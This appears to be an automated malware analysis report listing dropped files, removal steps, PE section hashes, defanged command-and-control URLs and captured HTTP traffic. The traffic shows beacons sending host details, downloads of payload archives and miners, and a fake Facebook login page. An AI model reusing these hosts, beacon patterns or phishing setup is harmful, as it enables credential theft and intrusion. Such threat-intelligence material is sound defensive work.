%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslPLAIN.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AOL_Member_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslCRAMMD5.dll (601 bytes)
%System%\mqyitew\purple\libssp-0.dll (36 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceEVRootCA.pem (1 bytes)
%System%\mqyitew\purple\libplds4.dll (14 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Primary_Root_CA.pem (1 bytes)
%System%\mqyitew\purple\libgmodule-2.0-0.dll (36 bytes)
%System%\mqyitew\purple\nss3.dll (5873 bytes)
%System%\mqyitew\purple\freebl3.dll (1425 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_Global_eBusiness_CA-1.pem (964 bytes)
%System%\mqyitew\purple\libgcc_s_dw2-1.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Root.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\statenotify.dll (15 bytes)
%System%\mqyitew\purple\plugins\ssl-nss.dll (28 bytes)
%System%\mqyitew\purple\sasl2\saslDIGESTMD5.dll (673 bytes)
%System%\mqyitew\purple\libjabber.dll (2321 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class3_Extended_Validation_CA.pem (2 bytes)
%System%\mqyitew\purple\libplc4.dll (15 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Class3.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\Baltimore_CyberTrust_Root.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Premium_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceCA-3.pem (2 bytes)
%System%\mqyitew\purple\zlib1.dll (673 bytes)
%System%\mqyitew\purple\libglib-2.0-0.dll (7726 bytes)
%System%\mqyitew\purple\ca-certs\America_Online_Root_Certification_Authority_1.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Deutsche_Telekom_Root_CA_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\ssl.dll (12 bytes)
%System%\mqyitew\purple\plugins\libxmpp.dll (21 bytes)
%System%\mqyitew\purple\libxml2-2.dll (7971 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G2.pem (1 bytes)
%System%\mqyitew\purple\libgthread-2.0-0.dll (44 bytes)
%System%\mqyitew\purple\softokn3.dll (673 bytes)
%System%\mqyitew\purple\ca-certs\Go_Daddy_Class_2_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_International_Server_Class_3_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslLOGIN.dll (601 bytes)
%System%\mqyitew\purple\libsasl.dll (673 bytes)
%System%\mqyitew\purple\libymsg.dll (1281 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\GTE_CyberTrust_Global_Root.pem (876 bytes)
%System%\mqyitew\purple\sasl2\saslANONYMOUS.dll (601 bytes)
%System%\mqyitew\dropbox\package.json (767 bytes)
%System%\mqyitew\dropbox\googleTakeout.js (14 bytes)
%System%\mqyitew\dropbox\mouse.js (4 bytes)
%System%\mqyitew\dropbox\phantomjs197.exe (53130 bytes)
%System%\mqyitew\dropbox\querystring.js (5 bytes)
%System%\mqyitew\dropbox\casper.js (601 bytes)
%System%\mqyitew\dropbox\cli.js (5 bytes)
%System%\mqyitew\dropbox\pagestack.js (4 bytes)
%System%\mqyitew\dropbox\http.js (2 bytes)
%System%\mqyitew\dropbox\colorizer.js (4 bytes)
%System%\mqyitew\dropbox\bootstrap.js (14 bytes)
%System%\mqyitew\dropbox\events.js (8 bytes)
%System%\mqyitew\dropbox\tester.js (59 bytes)
%System%\mqyitew\dropbox\dropbox2.js (25 bytes)
%System%\mqyitew\dropbox\clientutils.js (35 bytes)
%System%\mqyitew\dropbox\utils.js (21 bytes)
%System%\mqyitew\dropbox\xunit.js (6 bytes)
%WinDir%\Temp\glhljywourzj.exe (5873 bytes)
%System%\unzip.exe (7100 bytes)
%System%\win64mrocli2.exe (76437 bytes)
%System%\mqyitew\purple\purple.zip (90422 bytes)
%System%\mqyitew\rng (152 bytes)
%WinDir%\Temp\glhljywg9qzj.exe (1940 bytes)
%System%\win32mrocli2.exe (27367 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\mqyitew\run (10 bytes)
%System%\mqyitew\por (1 bytes)
%System%\mqyitew\ihst (226 bytes)
%WinDir%\Temp\glhljywapnzj.exe (35 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (35 bytes)
%System%\mqyitew\dropbox\dropbox.zip (181699 bytes)
%System%\mqyitew\purple\zip.exe (10500 bytes)
%System%\win64mroaes2.exe (76437 bytes)
%System%\eityzygishyx.exe (5873 bytes)
%System%\mqyitew\cfg (659 bytes)
%System%\mqyitew\purple\exefile (14580 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (35 bytes)
%System%\unovkkdak.exe (5873 bytes)
%System%\mqyitew\etc (10 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Presentation Accounts Workstation" = "%System%\unovkkdak.exe"
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	632022	632320	4.70428	a4fc99eea97ccdb182d32f3844055d71
.rdata	638976	51644	51712	3.67152	f06b92dfc0ddc505a883d9334948e6bd
.data	692224	159104	125440	5.4979	6991e368cfd31d00429808c0f0c682a2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://welltalk.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b528200	210.172.144.247
hxxp://wellshirt.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b528200	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/dropbox.zip	98.139.135.198
hxxp://wellshirt.net/dep/win64mrocli2.exe	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/win64mroaes2.exe	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/purple.zip	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=checkport&port=48744&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/zip.exe	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=exefile&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=all&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://www.fileswap.com/	216.155.129.123
hxxp://www.fileswap.com/_css/global.css?v=54	216.155.129.123
hxxp://www.fileswap.com/_js/jquery.js	216.155.129.123
hxxp://www.fileswap.com/_js/jquery-ui.js	216.155.129.123
hxxp://www.fileswap.com/_js/AC_OETags.js	216.155.129.123
hxxp://www.fileswap.com/_js/global.js?ver=d10	216.155.129.123
hxxp://www.fileswap.com/ext/swfupload/swfupload.js	216.155.129.123
hxxp://www.fileswap.com/ext/swfupload/handlers.js?v=ebg	216.155.129.123
hxxp://www.fileswap.com/_images/footer_bg.png	216.155.129.123
hxxp://www.fileswap.com/_images/ico_24_upload.png	216.155.129.123
hxxp://www.fileswap.com/_images/ico_24_sharelink.png	216.155.129.123
hxxp://www.fileswap.com/_images/ico_24_social.png	216.155.129.123
hxxp://www.fileswap.com/_images/ajax-loader.gif	216.155.129.123
hxxp://www.fileswap.com/_images/icon/ico_footer_twitter.png	216.155.129.123
hxxp://www.fileswap.com/_images/contact_support.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_bg.png	216.155.129.123
hxxp://www.fileswap.com/_images/logo/fileswap_large.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_upload.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_sync.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_upgrade.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_refer.png	216.155.129.123
hxxp://www.fileswap.com/_images/login_highlight.png	216.155.129.123
hxxp://www.fileswap.com/_images/statement_bg.jpg	216.155.129.123
hxxp://e3821.dspe1.akamaiedge.net/en_US/all.js
hxxp://www.fileswap.com/_images/home/home_gradient_01.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_upload_01.jpg	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_upload_button.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_gradient_02.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_signup_button.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_upload_02.jpg	216.155.129.123
hxxp://www.fileswap.com/_images/footer_bg2.png	216.155.129.123
hxxp://pagead.l.doubleclick.net/pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/
hxxp://plus.l.google.com/ga.js
hxxp://a749.dsw4.akamai.net/connect/xd_arbiter/V80PAcvrynR.js?version=41
hxxp://plus.l.google.com/__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=www.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none);&utmu=q~
hxxp://pagead.l.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://wellshirt.net/fb_login/?session=3b528200	98.139.135.198
hxxp://www.google.com/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://www.fileswap.com/&random=2372120351	173.194.43.50
hxxp://www.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://www.fileswap.com/&random=2372120351&ipr=y	173.194.43.56
hxxp://wellshirt.net/fb_login/index_files/VYqjPg0eFkT.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/QzuAG9bQwbS.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/z15ZzhgIj4W.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/YpD-WuoLxM8.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/kHhQaysvKcA.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/lV3BV1YRc-7.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/xgsOhvNndM-.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/tjP47PMhke1.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/-PAXP-deijE.gif?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_1535348985.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_1538611903.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_367648155.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_646761364.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/safe_image.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/?session=3b528200	98.139.135.198
hxxp://www.googleadservices.com/pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/	173.194.43.45
hxxp://static.ak.facebook.com/connect/xd_arbiter/V80PAcvrynR.js?version=41	184.84.243.200
hxxp://middleevery.net/fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200	98.139.135.198
hxxp://connect.facebook.net/en_US/all.js	23.66.191.139
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=www.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none);&utmu=q~	173.194.43.38
hxxp://middleevery.net/fb_login/index_files/lV3BV1YRc-7.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/z15ZzhgIj4W.css?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/win64mrocli2.exe	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/safe_image.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/kHhQaysvKcA.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/QzuAG9bQwbS.css?session=3b528200	98.139.135.198
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0	173.194.43.58
hxxp://middleevery.net/dep/zip.exe	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/YpD-WuoLxM8.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/dropbox.zip	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_1538611903.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/win64mroaes2.exe	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_646761364.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_1535348985.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_367648155.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/-PAXP-deijE.gif?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/purple.zip	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/xgsOhvNndM-.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/VYqjPg0eFkT.css?session=3b528200	98.139.135.198
hxxp://www.google-analytics.com/ga.js	173.194.43.38
hxxp://middleevery.net/fb_login/index_files/tjP47PMhke1.js?session=3b528200	98.139.135.198
minin.gs	107.170.193.84
fbstatic-a.akamaihd.net	184.84.243.200
s-static.ak.facebook.com	23.66.178.110
apis.google.com	173.194.43.40
chat.facebook.com	173.252.107.17
error.facebook.com	31.13.69.160

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: googleads.g.doubleclick.net

HTTP/1.1 302 Found

P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Date: Fri, 30 May 2014 15:56:12 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, must-revalidate

Location: hXXp://VVV.google.com/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351

Content-Type: image/gif

X-Content-Type-Options: nosniff

Server: cafe

Content-Length: 42

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic

Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 30-May-2014 16:11:12 GMT; path=/; domain=.doubleclick.net

GIF89a.............!.......,...........D.;..

GET /fb_login/?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Referer: hXXp://VVV.fileswap.com/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:12 GMT

Set-Cookie: BX=dbnbs819ohags&b=3&s=gs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.middleevery.net

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Connection: close

Server: YTS/1.20.28

.<!DOCTYPE html>.<html id="facebook" class="canHaveFixedElements" lang="en"><head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta charset="utf-8"><script>function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(window.requireLazy){requireLazy(['Env'],b);}else{Env=window.Env||{};b(Env);}}envFlush({"ffid1":"AcHKD6PoX2xFbcVkoIMPSwT-mjiSNxXUTRjwUd3Yp1_EYEq_w-NFvMeWHUfw1XVxiiw","ffid2":"AcEFu56i6aA6VpuY7zf28xde8QxejU8YtgQMai3iTb5YgCTNuz8hNm_PaLGlodmqOpY","ffid3":"AcH3wXq-O_VXCipLT3BNx1Yj1vIR_2-_Sm91YeYGWEygxMYVX2ZYA3lca5O1VnMT7JIGk_NVjQ_r52TNgis-_3Fh","ffid4":"AcHbEP4Fkpz1ZfifbEso0ekacGz00hYYhksxdiDUrQfBTGODZ1mWbHJKRANR8uDDsk8","ffver":63083,"recaptcha_focus_on_load":"false","recaptcha_lang":"\"en\"","user":"0","locale":"en_US","method":"GET","svn_rev":772429,"tier":"","push_phase":"V3","pkg_cohort":"EXP1:DEFAULT","vip":"69.171.229.25","www_base":"http:\/\/VVV.facebook.com\/","rep_lag":2,"fb_dtsg":"AQButNFh","ajaxpipe_token":"AXgCPts7l-QsNxPv","lhsh":"4AQGq_2W7","tracking_domain":"https:\/\/pixel.facebook.com","retry_ajax_on_network_error":"1","fbid_emoticons":"1"});</script><script>envFlush({"eagleEyeConfig":{"seed":"0ejD"}});CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript><meta name="robots" content="noodp, noydir"><meta name="referrer" content="default" id="meta_referrer"><meta name="description" content="Facebook is a social utili

<<< skipped >>>

GET /fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 103

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28

/*1354335490,178142533*/...fbRegistrationPPT .text{font-size:11px}..#bootloader_VuNPD { height: 42px; }..

GET /connect/xd_arbiter/V80PAcvrynR.js?version=41 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: static.ak.facebook.com

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8

X-Content-Type-Options: nosniff

X-XSS-Protection: 0

Content-Encoding: gzip

X-FB-Debug: LzWU/tjEwMFRT0 02NV5KDUHMw6QAuPeUPFnPwyiNEM=

Vary: Accept-Encoding

Content-Length: 8779

Cache-Control: public, max-age=31356073

Expires: Thu, 28 May 2015 13:57:25 GMT

Date: Fri, 30 May 2014 15:56:12 GMT

Connection: keep-alive

...........|i..F..w....]@..Q..n..U#..G3.F...&.z.@....,.........H.(......(.yFFDF........_|....V....k..3..:.....b..&..z.&Y..9..0...,c.0.[...<.n...-.w......K.y~c.....8o..7......%3.k.#..y..M3..'.|..E..a.;.lS./..z?.p/o..$O...7..S..IM.E.4...%..%....}.....l.,..=;.;TuN.....a.=.......|..-.u..%..J..vw...[..}y...U.M.cC<.N.~....W...,...(IRG<.a.c..Z...K&......( .....BO.IF.Ln.:..A.......P.2Mar.E.....A.5#.....)..39.......9........c.$.]H...(.b..X...X<...A....#.d^@...,L........F9O.......9&.&.70...3h y.\.Z.9.h..Is...d.^.krfq|...9Y...4!s...a..c.L.Bl..*CP..^.U..J...ba.^8pCwL.Z.........~fuY2..T...../M.....K.c.........J..-..vH...]...N.......$.#.n..B.F...I..il\.!0bY.Z...9..{50......\P0]....:.*F...d.}.......fwP.....Q...F:.1..H....F..bL.... Ix.......\.."...u..N..e.....m@.....:.Fa....bM7h4...2w...x:...M@.E..._x.J-. ..(.....m ..8.-f.M..... .\i....ky.4.dLM............ F.X.~..H.@.9...I.%..d 5.....)v...c..i...(.~........G.2d6.7.C.Z.0.`. .0.Yd-Y..v.g....c8.r.H........7.....O({.......,..8Y..@...z..X........<!..x4j..........e.k.._........3...Y....E.b...X.E.[Cn..... .H.C!.@.G.-.=...S V..."%...6.......?p<.Y.!.....&....s.&..vbr..w...9......rds..o.!.f.y.....d.........n.......Xs....Z.R.j....A.%..~.....?..'.0>..C.......hp..x.]..9.b...U..n..Ig"....P9.......=....r.0{....F.:......@o....."...........1..&q.@...:..P......E.....pa.....O...........~...h....!O...J......S......Z......_........x.......W..>..../...^C|....../O........e.G.w4."...Zc.o0Y._..q............/L........A.}....\<.......G.q...xL..&.jX.....w.....k..^.....&hA...0J}

<<< skipped >>>

GET /connect/xd_arbiter/V80PAcvrynR.js?version=41 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: static.ak.facebook.com

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8

X-Content-Type-Options: nosniff

X-XSS-Protection: 0

Content-Encoding: gzip

X-FB-Debug: LzWU/tjEwMFRT0 02NV5KDUHMw6QAuPeUPFnPwyiNEM=

Vary: Accept-Encoding

Content-Length: 8779

Cache-Control: public, max-age=31356072

Expires: Thu, 28 May 2015 13:57:25 GMT

Date: Fri, 30 May 2014 15:56:13 GMT

Connection: keep-alive

<<< skipped >>>

GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

Content-Type: text/html

Age: 0

Server: YTS/1.20.28

.............

GET /en_US/all.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: connect.facebook.net

HTTP/1.1 200 OK

ETag: "fd8c6a9f92c55c011adcbc409e00026e"

Content-Type: application/x-javascript; charset=utf-8

Timing-Allow-Origin: *

Content-Encoding: gzip

Content-MD5: YDYtMDo5BiGKdWAidVv7Nw==

X-FB-Debug: liwqYrYBPa75LLtIadkW1ZABvIl7wQurY1yoMd3OU6I=

Content-Length: 53567

Cache-Control: public, max-age=1200

Expires: Fri, 30 May 2014 16:16:12 GMT

Date: Fri, 30 May 2014 15:56:12 GMT

Connection: keep-alive

Vary: Accept-Encoding

